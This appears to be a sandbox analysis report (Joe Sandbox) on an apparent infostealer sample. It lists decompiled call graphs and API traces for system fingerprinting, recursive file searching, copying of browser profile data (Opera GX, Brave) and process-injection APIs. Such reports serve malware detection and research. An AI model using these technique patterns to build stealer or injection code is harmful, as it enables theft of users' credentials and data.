89335->89336 89336->88517 89479 42f109 89337->89479 89339 411813 CoInitializeEx CoInitializeSecurity CoCreateInstance 89340 41186b 89339->89340 89341 411873 CoSetProxyBlanket 89340->89341 89346 411964 89340->89346 89343 4118a3 89341->89343 89342 4104e7 lstrcpyA 89344 41198f 89342->89344 89343->89346 89348 4118d7 VariantInit 89343->89348 89345 42f165 5 API calls 89344->89345 89347 411996 89345->89347 89346->89342 89347->88531 89349 4118f6 89348->89349 89480 411757 89349->89480 89351 411901 FileTimeToSystemTime GetProcessHeap HeapAlloc wsprintfA 89352 4104e7 lstrcpyA 89351->89352 89353 411958 VariantClear 89352->89353 89353->89344 89489 42f09d 89354->89489 89356 4119a3 CoInitializeEx CoInitializeSecurity CoCreateInstance 89357 4119f9 89356->89357 89358 411a01 CoSetProxyBlanket 89357->89358 89359 411a93 89357->89359 89360 411a31 89358->89360 89361 4104e7 lstrcpyA 89359->89361 89360->89359 89363 411a59 VariantInit 89360->89363 89362 411abe 89361->89362 89362->88544 89364 411a78 89363->89364 89490 411d42 LocalAlloc CharToOemW 89364->89490 89366 411a80 89367 4104e7 lstrcpyA 89366->89367 89368 411a87 VariantClear 89367->89368 89368->89362 89369->88572 89371 4104e7 lstrcpyA 89370->89371 89372 4115cd 89371->89372 89372->88587 89374 4104e7 lstrcpyA 89373->89374 89375 410e02 GetKeyboardLayoutList LocalAlloc GetKeyboardLayoutList 89374->89375 89383 410e3c 89375->89383 89384 410eed 89375->89384 89376 410e42 GetLocaleInfoA 89376->89383 89377 410f05 89379 41d016 __ehhandler$?_StructuredChoreWrapper@_UnrealizedChore@details@Concurrency@@CAXPAV123@@Z 5 API calls 89377->89379 89378 410ef9 LocalFree 89378->89377 89380 410f15 89379->89380 89380->88601 89381 410609 lstrlenA lstrcpyA lstrcatA 89381->89383 89382 41058d lstrcpyA 89382->89383 89383->89376 89383->89381 89383->89382 89383->89384 89384->89377 89384->89378 89386 410d86 89385->89386 89387 410d6a wsprintfA 89385->89387 89388 41d016 __ehhandler$?_StructuredChoreWrapper@_UnrealizedChore@details@Concurrency@@CAXPAV123@@Z 5 API calls 89386->89388 89387->89386 89389 410d93 89388->89389 89389->88629 89391 410f94 RegQueryValueExA 89390->89391 89392 410fac 89390->89392 89391->89392 89392->88647 89394 41107c GetLogicalProcessorInformationEx 89393->89394 89395 411087 89394->89395 89396 411048 GetLastError 89394->89396 89493 411b5b GetProcessHeap HeapFree 89395->89493 89397 4110f3 89396->89397 89398 411057 89396->89398 89400 4110fd 89397->89400 89494 411b5b GetProcessHeap HeapFree 89397->89494 89408 41105b 89398->89408 89405 41d016 __ehhandler$?_StructuredChoreWrapper@_UnrealizedChore@details@Concurrency@@CAXPAV123@@Z 5 API calls 89400->89405 89401 4110c0 89401->89400 89406 4110c9 wsprintfA 89401->89406 89407 411117 89405->89407 89406->89400 89407->88661 89408->89394 89409 4110ec 89408->89409 89491 411b5b GetProcessHeap HeapFree 89408->89491 89492 411b78 GetProcessHeap HeapAlloc 89408->89492 89409->89400 89411 41d016 __ehhandler$?_StructuredChoreWrapper@_UnrealizedChore@details@Concurrency@@CAXPAV123@@Z 5 API calls 89410->89411 89412 411005 89411->89412 89412->88675 89495 411b26 89413->89495 89416 41115f wsprintfA 89418 41d016 __ehhandler$?_StructuredChoreWrapper@_UnrealizedChore@details@Concurrency@@CAXPAV123@@Z 5 API calls 89416->89418 89419 411190 89418->89419 89419->88689 89421 4104e7 lstrcpyA 89420->89421 89424 4111b3 89421->89424 89422 4111df EnumDisplayDevicesA 89423 4111f3 89422->89423 89422->89424 89426 41d016 __ehhandler$?_StructuredChoreWrapper@_UnrealizedChore@details@Concurrency@@CAXPAV123@@Z 5 API calls 89423->89426 89424->89422 89424->89423 89425 410549 2 API calls 89424->89425 89425->89424 89427 411201 89426->89427 89427->88703 89429 4104e7 lstrcpyA 89428->89429 89430 4114c6 CreateToolhelp32Snapshot Process32First 89429->89430 89431 41154c CloseHandle 89430->89431 89435 4114ee 89430->89435 89432 41d016 __ehhandler$?_StructuredChoreWrapper@_UnrealizedChore@details@Concurrency@@CAXPAV123@@Z 5 API calls 89431->89432 89434 411561 89432->89434 89433 41153a Process32Next 89433->89431 89433->89435 89434->88717 89435->89433 89436 410609 lstrlenA lstrcpyA lstrcatA 89435->89436 89437 41058d lstrcpyA 89435->89437 89436->89435 89437->89435 89439 4104e7 lstrcpyA 89438->89439 89440 41123b RegOpenKeyExA 89439->89440 89441 41145e 89440->89441 89453 411281 89440->89453 89443 410519 lstrcpyA 89441->89443 89442 411287 RegEnumKeyExA 89444 4112c4 wsprintfA RegOpenKeyExA 89442->89444 89442->89453 89445 411489 89443->89445 89444->89441 89446 41130a RegQueryValueExA 89444->89446 89448 41d016 __ehhandler$?_StructuredChoreWrapper@_UnrealizedChore@details@Concurrency@@CAXPAV123@@Z 5 API calls 89445->89448 89447 411340 lstrlenA 89446->89447 89446->89453 89447->89453 89449 4114a3 89448->89449 89449->88731 89450 4113b0 RegQueryValueExA 89450->89453 89451 410609 lstrlenA lstrcpyA lstrcatA 89451->89453 89452 41058d lstrcpyA 89452->89453 89453->89441 89453->89442 89453->89450 89453->89451 89453->89452 89455 416ea7 89454->89455 89456 41058d lstrcpyA 89455->89456 89457 416ec4 89456->89457 89458 41058d lstrcpyA 89457->89458 89459 416ee0 89458->89459 89460 41058d lstrcpyA 89459->89460 89461 416eeb 89460->89461 89462 41058d lstrcpyA 89461->89462 89463 416ef6 89462->89463 89472 41160c RegOpenKeyExA 89471->89472 89472->89319 89472->89320 89476 410ba9 GetProcessHeap HeapAlloc RegOpenKeyExA 89473->89476 89475 410b58 89475->89334 89475->89336 89477 410bec RegQueryValueExA 89476->89477 89478 410c03 89476->89478 89477->89478 89478->89475 89479->89339 89488 42f09d 89480->89488 89482 411763 CoCreateInstance 89483 4117e7 89482->89483 89484 41178b SysAllocString 89482->89484 89483->89351 89484->89483 89485 41179a 89484->89485 89486 4117e0 SysFreeString 89485->89486 89487 4117be _wtoi64 SysFreeString 89485->89487 89486->89483 89487->89486 89488->89482 89489->89356 89490->89366 89491->89408 89492->89408 89493->89401 89494->89400 89496 41114d GlobalMemoryStatusEx 89495->89496 89496->89416

                                                                                                                                                        Executed Functions

                                                                                                                                                        Function 00418950 Relevance: 231.5, APIs: 121, Strings: 11, Instructions: 518libraryloaderCOMMON
                                                                                                                                                        Download Yara Rule

                                                                                                                                                        Control-flow Graph

                                                                                                                                                        APIs
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000003.00000002.2801902141.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: AddressProc$LibraryLoad
                                                                                                                                                        • String ID: CreateProcessA$GetThreadContext$HttpQueryInfoA$InternetSetOptionA$ReadProcessMemory$ResumeThread$SetThreadContext$SymMatchString$VirtualAllocEx$WriteProcessMemory$dbghelp.dll
                                                                                                                                                        • API String ID: 2238633743-2740034357
                                                                                                                                                        • Opcode ID: 3e30b89850b8473fc7cede02b6692b6796462800fa081e8782096f790b2d890e
                                                                                                                                                        • Instruction ID: 8261b1413bc3cc4e1081ef522fb3a36784379b70ccc82e73ae8bdeed84e113b8
                                                                                                                                                        • Opcode Fuzzy Hash: 3e30b89850b8473fc7cede02b6692b6796462800fa081e8782096f790b2d890e
                                                                                                                                                        • Instruction Fuzzy Hash: 7352F475910312AFEF1ADFA0FD188243BA7F718707F11A466E91582270E73B4A64EF19
                                                                                                                                                        Function 00414CC8 Relevance: 44.0, APIs: 21, Strings: 4, Instructions: 297stringfileCOMMON
                                                                                                                                                        Download Yara Rule

                                                                                                                                                        Control-flow Graph

                                                                                                                                                        • Executed
                                                                                                                                                        • Not Executed
                                                                                                                                                        control_flow_graph 1696 414cc8-414d6f call 42e390 wsprintfA FindFirstFileA call 423c10 * 2 1703 414d75-414d89 StrCmpCA 1696->1703 1704 41512b-415141 call 401cde call 41d016 1696->1704 1705 4150f8-41510d FindNextFileA 1703->1705 1706 414d8f-414da3 StrCmpCA 1703->1706 1710 41511f-415125 FindClose 1705->1710 1711 41510f-415111 1705->1711 1706->1705 1709 414da9-414deb wsprintfA StrCmpCA 1706->1709 1713 414e0a-414e1c wsprintfA 1709->1713 1714 414ded-414e08 wsprintfA 1709->1714 1710->1704 1711->1703 1716 414e1f-414e5c call 423c10 lstrcatA 1713->1716 1714->1716 1719 414e82-414e89 strtok_s 1716->1719 1720 414e8b-414ec9 call 423c10 lstrcatA strtok_s 1719->1720 1721 414e5e-414e6f 1719->1721 1726 415089-41508d 1720->1726 1727 414ecf-414edf PathMatchSpecA 1720->1727 1725 414e75-414e81 1721->1725 1721->1726 1725->1719 1726->1705 1728 41508f-415095 1726->1728 1729 414ee5-414fbe call 4104e7 call 411c4a call 410609 call 4105c7 call 410609 call 4105c7 call 41058d call 402920 * 5 call 412166 call 42efc0 1727->1729 1730 414fd9-414fee strtok_s 1727->1730 1728->1710 1731 41509b-4150a9 1728->1731 1768 414fc0-414fd4 call 402920 1729->1768 1769 414ff9-415005 1729->1769 1730->1727 1733 414ff4 1730->1733 1731->1705 1734 4150ab-4150ed call 401cfd call 414cc8 1731->1734 1733->1726 1742 4150f2 1734->1742 1742->1705 1768->1730 1770 415116-41511d call 402920 1769->1770 1771 41500b-415031 call 410519 call 407fac 1769->1771 1770->1704 1781 415033-415077 call 401cfd call 4104e7 call 416e97 call 402920 1771->1781 1782 41507d-415084 call 402920 1771->1782 1781->1782 1782->1726
                                                                                                                                                        APIs
                                                                                                                                                        • wsprintfA.USER32 ref: 00414D1C
                                                                                                                                                        • FindFirstFileA.KERNEL32(?,?), ref: 00414D33
                                                                                                                                                        • _memset.LIBCMT ref: 00414D4F
                                                                                                                                                        • _memset.LIBCMT ref: 00414D60
                                                                                                                                                        • StrCmpCA.SHLWAPI(?,004369F8), ref: 00414D81
                                                                                                                                                        • StrCmpCA.SHLWAPI(?,004369FC), ref: 00414D9B
                                                                                                                                                        • wsprintfA.USER32 ref: 00414DC2
                                                                                                                                                        • StrCmpCA.SHLWAPI(?,0043660F), ref: 00414DD6
                                                                                                                                                        • wsprintfA.USER32 ref: 00414DFF
                                                                                                                                                        • wsprintfA.USER32 ref: 00414E16
                                                                                                                                                          • Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
                                                                                                                                                          • Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
                                                                                                                                                          • Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650
                                                                                                                                                          • Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
                                                                                                                                                          • Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF
                                                                                                                                                          • Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD
                                                                                                                                                          • Part of subcall function 00412166: CreateFileA.KERNEL32(00414FAC,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,?,00414FAC,?), ref: 00412181
                                                                                                                                                        • _memset.LIBCMT ref: 00414E28
                                                                                                                                                        • lstrcatA.KERNEL32(?,?), ref: 00414E3D
                                                                                                                                                        • strtok_s.MSVCRT ref: 00414E82
                                                                                                                                                        • _memset.LIBCMT ref: 00414E94
                                                                                                                                                        • lstrcatA.KERNEL32(?,?), ref: 00414EA9
                                                                                                                                                        • strtok_s.MSVCRT ref: 00414EC2
                                                                                                                                                        • PathMatchSpecA.SHLWAPI(?,00000000), ref: 00414ED7
                                                                                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00414FB6
                                                                                                                                                        • strtok_s.MSVCRT ref: 00414FE7
                                                                                                                                                        • FindNextFileA.KERNELBASE(?,?), ref: 00415105
                                                                                                                                                        • FindClose.KERNEL32(?), ref: 00415125
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000003.00000002.2801902141.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: _memsetlstrcatwsprintf$FileFindlstrcpystrtok_s$CloseCreateFirstMatchNextPathSpecUnothrow_t@std@@@__ehfuncinfo$??2@lstrlen
                                                                                                                                                        • String ID: %s\%s$%s\%s$%s\%s\%s$%s\*.*
                                                                                                                                                        • API String ID: 2867719434-332874205
                                                                                                                                                        • Opcode ID: 0bc5adfbe4236ef78a4ad54126e2e77cc3e862c7c695f1d91d4ab824e5d186cb
                                                                                                                                                        • Instruction ID: 9fc36efd77a6d1cd63b80ec75f09b897df8326cc2b47f4e5761c6ba69d6b93d4
                                                                                                                                                        • Opcode Fuzzy Hash: 0bc5adfbe4236ef78a4ad54126e2e77cc3e862c7c695f1d91d4ab824e5d186cb
                                                                                                                                                        • Instruction Fuzzy Hash: 5BC12AB2E0021AABCF21EF61DC45AEE777DAF08305F0144A6F609B3151D7399B858F55
                                                                                                                                                        Function 0040884C Relevance: 42.4, APIs: 23, Strings: 1, Instructions: 405memoryfilestringCOMMON
                                                                                                                                                        Download Yara Rule

                                                                                                                                                        Control-flow Graph

                                                                                                                                                        • Executed
                                                                                                                                                        • Not Executed
                                                                                                                                                        control_flow_graph 1793 40884c-408865 call 410795 1796 408867-40886c 1793->1796 1797 40886e-40887e call 410795 1793->1797 1798 408885-40888d call 410549 1796->1798 1802 408880 1797->1802 1803 40888f-40889f call 410795 1797->1803 1805 4088a5-408922 call 4104e7 call 411c4a call 410609 call 4105c7 call 410609 call 4105c7 call 41058d call 402920 * 5 1798->1805 1802->1798 1803->1805 1809 408d72-408d96 call 402920 * 3 call 401cde 1803->1809 1841 408939-408949 CopyFileA 1805->1841 1842 408924-408936 call 410519 call 4122b0 1841->1842 1843 40894b-408984 call 4104e7 call 410609 call 41058d call 402920 1841->1843 1842->1841 1856 408986-4089d7 call 410609 call 41058d call 402920 call 4105c7 call 41058d call 402920 call 410609 call 41058d 1843->1856 1857 4089dc-408a5b call 410609 call 41058d call 402920 call 4105c7 call 41058d call 402920 call 410609 call 41058d call 402920 call 4105c7 call 410609 call 41058d call 402920 1843->1857 1890 408a60-408a79 call 402920 1856->1890 1857->1890 1899 408d4b-408d57 DeleteFileA call 402920 1890->1899 1900 408a7f-408a9a 1890->1900 1905 408d5c-408d6b call 402920 * 2 1899->1905 1907 408aa0-408ab6 GetProcessHeap RtlAllocateHeap 1900->1907 1908 408d37-408d4a 1900->1908 1920 408d6d call 402920 1905->1920 1911 408cda-408ce7 1907->1911 1908->1899 1918 408abb-408b9d call 4104e7 * 6 call 401cfd call 410519 call 40826d StrCmpCA 1911->1918 1919 408ced-408cf9 lstrlenA 1911->1919 1956 408ba3-408bb6 StrCmpCA 1918->1956 1957 408d97-408dd9 call 402920 * 8 1918->1957 1919->1908 1921 408cfb-408d27 call 401cfd lstrlenA call 410519 call 416e97 1919->1921 1920->1809 1933 408d2c-408d32 call 402920 1921->1933 1933->1908 1959 408bc0 1956->1959 1960 408bb8-408bbe 1956->1960 1957->1920 1962 408bc6-408bde call 410549 StrCmpCA 1959->1962 1960->1962 1967 408be0-408be6 1962->1967 1968 408be8 1962->1968 1970 408bee-408bf9 call 410549 1967->1970 1968->1970 1977 408c08-408cd5 lstrcatA * 14 call 402920 * 7 1970->1977 1978 408bfb-408c03 call 410549 1970->1978 1977->1911 1978->1977
                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 00410795: StrCmpCA.SHLWAPI(?,?,?,00408863,?,?,?), ref: 0041079E
                                                                                                                                                        • CopyFileA.KERNEL32(?,?,00000001,004371C4,004367CF,?,?,?), ref: 00408941
                                                                                                                                                          • Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417621), ref: 00410538
                                                                                                                                                          • Part of subcall function 004122B0: _memset.LIBCMT ref: 004122D7
                                                                                                                                                          • Part of subcall function 004122B0: OpenProcess.KERNEL32(00001001,00000000,?,00000000,?), ref: 0041237D
                                                                                                                                                          • Part of subcall function 004122B0: TerminateProcess.KERNEL32(00000000,00000000), ref: 0041238B
                                                                                                                                                          • Part of subcall function 004122B0: CloseHandle.KERNEL32(00000000), ref: 00412392
                                                                                                                                                          • Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
                                                                                                                                                          • Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
                                                                                                                                                          • Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650
                                                                                                                                                          • Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD
                                                                                                                                                          • Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
                                                                                                                                                          • Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF
                                                                                                                                                        • GetProcessHeap.KERNEL32(00000000,000F423F), ref: 00408AA6
                                                                                                                                                        • RtlAllocateHeap.NTDLL(00000000), ref: 00408AAD
                                                                                                                                                        • StrCmpCA.SHLWAPI(?,ERROR_RUN_EXTRACTOR), ref: 00408B95
                                                                                                                                                        • StrCmpCA.SHLWAPI(?,004371E8), ref: 00408BAB
                                                                                                                                                        • StrCmpCA.SHLWAPI(?,004371EC), ref: 00408BD3
                                                                                                                                                        • lstrlenA.KERNEL32(?), ref: 00408CF0
                                                                                                                                                        • lstrlenA.KERNEL32(?), ref: 00408D0B
                                                                                                                                                          • Part of subcall function 00416E97: CreateThread.KERNEL32(00000000,00000000,00416DC6,?,00000000,00000000), ref: 00416F36
                                                                                                                                                          • Part of subcall function 00416E97: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00416F3E
                                                                                                                                                        • DeleteFileA.KERNEL32(?), ref: 00408D4E
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000003.00000002.2801902141.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: lstrcpy$Processlstrlen$FileHeaplstrcat$AllocateCloseCopyCreateDeleteHandleObjectOpenSingleTerminateThreadWait_memset
                                                                                                                                                        • String ID: ERROR_RUN_EXTRACTOR
                                                                                                                                                        • API String ID: 2819533921-2709115261
                                                                                                                                                        • Opcode ID: 0b36c14b47e0fd9c7b7447fafa283bbeba69ea66fa84174adce9456e951a1997
                                                                                                                                                        • Instruction ID: 65d458a2be874082b650ad6ccfc12f730853009eff9118d7dbcfdf0fd3eb137e
                                                                                                                                                        • Opcode Fuzzy Hash: 0b36c14b47e0fd9c7b7447fafa283bbeba69ea66fa84174adce9456e951a1997
                                                                                                                                                        • Instruction Fuzzy Hash: CAE14F71A00209AFCF01FFA1ED4A9DD7B76AF04309F10502AF541B71A1DB796E958F98
                                                                                                                                                        Function 00409D1C Relevance: 40.9, APIs: 18, Strings: 5, Instructions: 610fileCOMMON
                                                                                                                                                        Download Yara Rule

                                                                                                                                                        Control-flow Graph

                                                                                                                                                        • Executed
                                                                                                                                                        • Not Executed
                                                                                                                                                        control_flow_graph 2000 409d1c-409dd5 call 4104e7 call 4105c7 call 410609 call 41058d call 402920 * 2 call 4104e7 * 2 FindFirstFileA 2017 40a788-40a7d7 call 402920 * 3 call 401cde call 402920 * 3 call 41d016 2000->2017 2018 409ddb-409def StrCmpCA 2000->2018 2019 40a761-40a776 FindNextFileA 2018->2019 2020 409df5-409e09 StrCmpCA 2018->2020 2019->2018 2023 40a77c-40a782 FindClose 2019->2023 2020->2019 2024 409e0f-409e85 call 410549 call 4105c7 call 410609 * 2 call 41058d call 402920 * 3 2020->2024 2023->2017 2055 409e8b-409ea1 StrCmpCA 2024->2055 2056 409f8e-40a002 call 410609 * 4 call 41058d call 402920 * 3 2024->2056 2058 409ea3-409f13 call 410609 * 4 call 41058d call 402920 * 3 2055->2058 2059 409f18-409f8c call 410609 * 4 call 41058d call 402920 * 3 2055->2059 2106 40a008-40a01d call 402920 StrCmpCA 2056->2106 2058->2106 2059->2106 2110 40a023-40a037 StrCmpCA 2106->2110 2111 40a1ef-40a204 StrCmpCA 2106->2111 2110->2111 2114 40a03d-40a173 call 4104e7 call 411c4a call 410609 call 4105c7 call 410609 call 4105c7 call 41058d call 402920 * 5 call 4104e7 call 410609 * 2 call 41058d call 402920 * 2 call 410519 call 407fac 2110->2114 2112 40a206-40a249 call 401cfd call 410519 * 3 call 40852e 2111->2112 2113 40a259-40a26e StrCmpCA 2111->2113 2177 40a24e-40a254 2112->2177 2117 40a270-40a281 StrCmpCA 2113->2117 2118 40a2cf-40a2e9 call 410519 call 411d92 2113->2118 2302 40a175-40a1b3 call 401cfd call 410519 call 416e97 call 402920 2114->2302 2303 40a1b8-40a1ea call 402920 * 3 2114->2303 2122 40a6d0-40a6d7 2117->2122 2123 40a287-40a28b 2117->2123 2146 40a2eb-40a2ef 2118->2146 2147 40a34f-40a364 StrCmpCA 2118->2147 2128 40a731-40a75b call 402920 * 2 2122->2128 2129 40a6d9-40a726 call 401cfd call 410519 * 2 call 4104e7 call 409d1c 2122->2129 2123->2122 2124 40a291-40a2cd call 401cfd call 410519 * 2 2123->2124 2174 40a335-40a33f call 410519 call 40884c 2124->2174 2128->2019 2194 40a72b 2129->2194 2146->2122 2156 40a2f5-40a32f call 401cfd call 410519 call 4104e7 2146->2156 2153 40a546-40a55b StrCmpCA 2147->2153 2154 40a36a-40a426 call 4104e7 call 411c4a call 410609 call 4105c7 call 410609 call 4105c7 call 41058d call 402920 * 5 CopyFileA 2147->2154 2153->2122 2159 40a561-40a61d call 4104e7 call 411c4a call 410609 call 4105c7 call 410609 call 4105c7 call 41058d call 402920 * 5 CopyFileA 2153->2159 2251 40a4b9-40a4c9 StrCmpCA 2154->2251 2252 40a42c-40a4b3 call 401cfd call 410519 * 3 call 408ddb call 401cfd call 410519 * 3 call 409549 2154->2252 2156->2174 2254 40a623-40a69e call 401cfd call 410519 * 3 call 409072 call 401cfd call 410519 * 3 call 4092a7 2159->2254 2255 40a6a4-40a6b6 DeleteFileA call 402920 2159->2255 2198 40a344-40a34a 2174->2198 2177->2122 2194->2128 2198->2122 2258 40a4cb-40a516 call 401cfd call 410519 * 3 call 409a0e 2251->2258 2259 40a51c-40a52e DeleteFileA call 402920 2251->2259 2252->2251 2254->2255 2270 40a6bb-40a6c2 2255->2270 2258->2259 2268 40a533-40a541 2259->2268 2274 40a6c9-40a6cb call 402920 2268->2274 2270->2274 2274->2122 2302->2303 2303->2111
                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                                                                          • Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
                                                                                                                                                          • Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF
                                                                                                                                                          • Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
                                                                                                                                                          • Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
                                                                                                                                                          • Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650
                                                                                                                                                          • Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD
                                                                                                                                                        • FindFirstFileA.KERNEL32(?,?,004367F2,004367EF,00437324,004367EE,?,?,?), ref: 00409DC6
                                                                                                                                                        • StrCmpCA.SHLWAPI(?,00437328), ref: 00409DE7
                                                                                                                                                        • StrCmpCA.SHLWAPI(?,0043732C), ref: 00409E01
                                                                                                                                                          • Part of subcall function 00410549: lstrlenA.KERNEL32(?,?,00417174,004366CF,004366CE,?,?,?,?,0041858F), ref: 0041054F
                                                                                                                                                          • Part of subcall function 00410549: lstrcpyA.KERNEL32(00000000,00000000,?,00417174,004366CF,004366CE,?,?,?,?,0041858F), ref: 00410581
                                                                                                                                                        • StrCmpCA.SHLWAPI(?,Opera GX,00437330,?,004367F3), ref: 00409E93
                                                                                                                                                        • StrCmpCA.SHLWAPI(?,Brave,00437350,00437354,00437330,?,004367F3), ref: 0040A015
                                                                                                                                                        • StrCmpCA.SHLWAPI(?,Preferences), ref: 0040A02F
                                                                                                                                                        • StrCmpCA.SHLWAPI(?), ref: 0040A1FC
                                                                                                                                                        • StrCmpCA.SHLWAPI(?), ref: 0040A266
